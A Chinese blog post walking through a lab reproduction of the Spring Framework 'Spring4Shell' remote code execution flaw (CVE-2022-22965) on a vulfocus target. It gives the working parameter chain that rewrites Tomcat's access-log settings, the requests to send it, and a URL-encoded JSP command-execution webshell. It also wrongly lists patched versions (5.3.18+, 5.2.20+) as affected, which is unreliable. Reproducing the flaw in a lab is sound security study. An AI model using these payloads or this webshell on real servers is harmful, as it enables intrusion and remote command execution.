【Vulfocus漏洞复现】spring-core-rce-2022-03-29

最新推荐文章于 2022-12-21 01:27:04 发布
最新推荐文章于 2022-12-21 01:27:04 发布
阅读量5k 收藏 9
点赞数 4
分类专栏: vulfocus漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45632448/article/details/124190382
版权

2022年3月30日,Spring框架曝出RCE 0day漏洞,国家信息安全漏洞共享平台(CNVD)已收录了Spring框架远程命令执行漏洞(CNVD-2022-23942),考虑到Spring框架的广泛应用,漏洞被评级为危险。

通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。

漏洞利用条件

1、Apache Tomcat作为Servlet容器;
2、使用JDK9及以上版本的Spring MVC框架;
3、Spring框架以及衍生的框架spring-beans-*.jar文件或者存在CachedIntrospectionResults.class

漏洞影响范围

1、JDK9+
2、Spring Framework

  • 5.3.18+
  • 5.2.20+

漏洞复现

本机:windows11
靶场:vulfocus

开启靶场环境并访问
在这里插入图片描述
在这里插入图片描述
利⽤class对象构造利⽤链,对Tomcat的日志配置进行修改,然后,向⽇志中写⼊shell
完整利用链:

class.module.classLoader.resources.context.parent.pipeline.first.pattern=
构建文件的内容
 
class.module.classLoader.resources.context.parent.pipeline.first.suffix=
修改tomcat日志文件后缀
 
class.module.classLoader.resources.context.parent.pipeline.first.directory=
写入文件所在的网站根目录
 
class.module.classLoader.resources.context.parent.pipeline.first.prefix=
写入文件名称
 
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
文件日期格式(实际构造为空值即可)

构造payload

class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

发送payload:
GET方式发送(需要分五次请求,以下为其中一次),出现ok说明执行成功

http://123.58.236.76:27379/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring
http://123.58.236.76:27379/?class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
http://123.58.236.76:27379/?class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
http://123.58.236.76:27379/?class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell
http://123.58.236.76:27379/?class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

在这里插入图片描述

访问http://123.58.236.76:27379/shell.jsp,出现spring说明写入成功
在这里插入图片描述
不难理解,接下来需要做的就是将内容更改为webshell,并让它解析就可以了
写入webshell到网站根目录

url编码前的webshell:
%{c2}i if("t".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i

url编码后的webshell:
%25%7Bc2%7Di%20if(%22t%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di

在这里插入图片描述

访问http://123.58.236.76:27379/shell.jsp?pwd=t&cmd=ls /tmp,出现flag
在这里插入图片描述

青果@
关注
  • 4
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-8813 Cacti v1.2.8 RCE.MD
04-13
CVE-2020-8813 Cacti v1.2.8 RCE
ClassCMS 2.4代码审计1
08-03
ClassCMS 2.4 代码审计 - 先知社区此次漏洞分析皆在本地测试,且漏洞已经提交 cnvd 平台需要后台管理员权限在后台的 管理 -> 应管理 -> 应
爆肝!!包含复现流程、部分exp、poc和编码小脚本的11个Spring漏洞复现合集
qq_43606723的博客
07-31 1504
这篇包含复现流程、部分exp、poc、加工小脚本和小心得的11个Spring漏洞复现合集是我与shmily师傅利用hvv前的空余时间复现、编写出来的。希望能简化大家开始着手系统性学习Spring框架的繁琐流程,提升学习效率。文章内容如有不妥和错误,请大佬们斧正。...
CVE-2022-22965:Spring core RCE漏洞
冬的博客
04-11 3746
3月29日,Spring框架曝出RCE 0day漏洞。已经证实由于 SerializationUtils#deserialize 基于 Java 的序列化机制,可导致远程代码执行 (RCE),使用JDK9及以上版本皆有可能受到影响。
搭建vulfocus漏洞靶场
yzl_007的博客
09-22 4427
搭建vulfocus漏洞靶场 首先准备好了一台centos7系统的虚拟机 可以在这里下载http://mirrors.neusoft.edu.cn/centos/7/isos/x86_64/ 看自己需求下载 然后安装docker curl -fsSL https://get.docker.com | bash -s docker --mirror aliyun 启动docker systemctl start docker 拉取镜像 docker pull vulfocus/vulfocus:lat
spring-core-rce-2022-03-29 漏洞复现
m0_46371267的博客
09-20 508
spring-core-rce 漏洞复现
Spring Framework 漏洞复现
Miss的博客
04-14 4485
环境搭建 拉取镜像进入靶场:docker pull vulfocus/spring-core-rce-2022-03-29:latest 运行:docker run -itd -p 8090:8080 vulfocus/spring-core-rce-2022-03-29:lateast 漏洞复现 访问:http://IP:8090/ 利用链是修改TOMCAT日志,向日志中写入shell。 这里最重要的是data部分,依次发送五个请求。访问Tomcat日志,设置suffix后缀,设置路径webapp/ro
[CVE-2022-22965]Spring远程代码执行漏洞复现
sGanYu
04-26 4053
漏洞概述(级别:高危) 续上一次Log4j2后,于20220329日,Spring官方发布了Spring框架远程命令执行漏洞公告(CNVD-2022-23942、CVE-2022-22965) 攻击者可以通过构造恶意请求来利用这些漏洞,从而造成任意代码执行,未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行,该漏洞广泛存在于Spring框架以及衍生的框架中,JDK 9.0及以上版本会受到此漏洞影响 FOFA语法 app="APACHE-Tomcat" || app="vmware-Sprin
Spring4shell远程命令执行(CVE-2022-22965)
m0_58596609的博客
10-09 2009
Spring4shell远程命令执行(CVE-2022-22965
2022年12月最新)spring-core-rce漏洞复现CVE-2022-22965
qq1140037586的博客
12-21 1641
2022年3月29日,Spring框架曝出RCE 0day漏洞。已经证实由于 SerializationUtils#deserialize 基于 Java 的序列化机制,可导致远程代码执行 (RCE),使用JDK9及以上版本皆有可能受到影响。通过该漏洞可写入webshell以及命令执行。在Spring框架的JDK9版本(及以上版本)中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并诸如恶意字段值,从而触发pipeline机制并写入任意路径下的文件。
向日葵RCE漏洞(CNVD-2022-10270)检测工具
02-19
向日葵RCE漏洞(CNVD-2022-10270)检测工具,已经编译好,命令行运行即可 xrkrce.exe -h 127.0.0.1
CVE-2021-34473 Exchange RCE.MD
04-23
CVE-2021-34473 Exchange RCE
CVE-2021-26855 Exchange RCE.MD
04-23
CVE-2021-26855 Exchange RCE
CVE-2020-17144 Exchange RCE.MD
04-13
CVE-2020-17144 Exchange RCE
CVE-2020-0688 Exchange Rce.MD
04-13
CVE-2020-0688 Exchange Rce
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
1.漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 Spring官方博客发布了一篇关于Spring Cloud ...
致远m3-server反序列化rce漏洞复现
最新发布
12-22
致远m3-server存在反序列化RCE漏洞,攻击者可以利用此漏洞在远程服务器上执行恶意代码。为了复现这个漏洞,我们可以按照以下步骤进行: 1. 确认漏洞版本:首先需要确定目标服务器上的致远m3-server版本是否存在漏洞...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值